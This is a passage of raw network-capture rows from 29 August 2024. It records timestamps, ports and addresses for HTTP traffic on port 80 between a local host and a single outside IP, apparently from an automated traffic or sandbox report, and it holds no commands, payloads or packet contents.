                                    Aug 29, 2024 12:02:36.364973068 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.364988089 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.364998102 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.365000010 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.365015984 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.365017891 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.365037918 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.365077019 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.365434885 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.365447998 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.365458965 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.365464926 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.365479946 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.365488052 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.365493059 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.365509987 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.365514040 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.365530968 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.365542889 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.365542889 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.365552902 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.365566015 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.365582943 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.365588903 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.365588903 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.365596056 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.365623951 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.365623951 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.365624905 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.365642071 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.365645885 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.365653992 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.365669012 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.365679979 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.365679979 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.365684032 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.365695953 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.365699053 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.365714073 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.365724087 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.365725994 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.365741968 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.365747929 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.365757942 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.365770102 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.365777969 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.365786076 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.365786076 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.365788937 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.365803003 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.365816116 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.365822077 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.365828037 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.365844011 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.365858078 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.365858078 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.365860939 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.365878105 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.365943909 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.366398096 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.366410971 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.366422892 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.366439104 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.366439104 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.366451979 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.366466999 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.366477013 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.366480112 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.366496086 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.366503954 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.366508961 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.366524935 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.366539001 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.366539955 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.366539001 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.366559029 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.366561890 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.366580963 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.366595030 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.366600037 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.366600037 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.366610050 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.366621017 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.366622925 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.366637945 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.366641045 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.366653919 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.366668940 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.366671085 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.366671085 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.366682053 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.366698980 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.366712093 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.366719007 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.366719007 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.366728067 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.366739988 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.366744041 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.366754055 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.366767883 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.366771936 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.366782904 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.366794109 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.366806030 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.366806030 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.366808891 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.366821051 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.366836071 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.366841078 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.366849899 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.366866112 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.366925955 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.367335081 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.367347956 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.367358923 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.367372990 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.367387056 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.367387056 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.367404938 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.367419004 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.367419004 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.367420912 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.367435932 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.367455959 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.367458105 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.367470980 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.367484093 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.367486954 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.367500067 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.367512941 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.367515087 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.367537022 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.367547989 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.367558956 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.367558956 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.367563009 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.367573977 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.367585897 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.367597103 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.367609978 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.367613077 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.367624044 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.367638111 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.367639065 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.367650986 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.367652893 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.367666006 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.367681026 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.367696047 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.367697954 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.367697954 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.367711067 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.367724895 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.367733955 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.367733955 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.367741108 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.367755890 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.367769957 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.367769957 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.367862940 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.368309021 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.368323088 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.368334055 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.368340969 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.368354082 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.368367910 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.368372917 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.368372917 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.368381023 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.368396044 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.368403912 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.368408918 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.368421078 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.368432999 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.368437052 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.368437052 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.368447065 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.368468046 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.368499041 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.368504047 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.368511915 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.368525028 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.368541002 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.368545055 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.368552923 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.368582010 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.368582964 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.368601084 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.368621111 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.379334927 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379369974 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379383087 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379410982 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379424095 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379440069 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379453897 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379451990 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.379479885 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.379518986 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.379550934 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379561901 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379573107 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379590988 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379611015 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.379611015 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.379642963 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.379723072 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379740953 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379755020 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379770994 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379777908 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.379777908 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.379785061 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379796028 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.379798889 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379813910 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379817963 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.379826069 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379841089 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379843950 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.379868984 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.379914045 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.379914999 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379971027 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.379977942 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.379990101 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380002022 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380018950 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380043983 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380043983 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380150080 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380162001 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380172968 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380184889 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380202055 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380203009 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380214930 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380227089 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380228996 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380270958 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380294085 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380419016 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380431890 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380443096 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380450010 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380464077 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380476952 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380489111 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380489111 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380505085 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380506039 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380517960 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380525112 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380532026 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380544901 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380548954 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380559921 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380572081 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380579948 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380605936 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380620956 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380635023 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380692959 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380764008 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380775928 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380788088 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380800962 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380822897 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380832911 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380836964 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380851030 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380851984 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380865097 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380866051 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380880117 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380884886 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380894899 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.380928040 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.380928040 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.381120920 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381134033 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381148100 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381162882 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381176949 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381190062 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381194115 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.381194115 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.381203890 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381217003 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381220102 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.381232023 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381236076 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.381243944 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381258965 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381269932 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.381297112 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.381455898 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381468058 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381479025 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381494999 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381499052 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.381510019 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381521940 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381524086 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.381536007 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381546021 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.381550074 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381565094 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381578922 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381582975 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.381582975 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.381591082 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381613016 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.381650925 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.381833076 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381844044 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381855965 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381869078 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381882906 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381886005 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.381886005 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.381895065 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381906986 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381920099 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381921053 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.381934881 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381939888 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.381947994 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381963968 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.381974936 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.381998062 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.381998062 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.382177114 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.382189035 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.382199049 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.382215023 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.382220984 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.382234097 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.382249117 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.382262945 CEST8049717172.67.128.117192.168.2.6
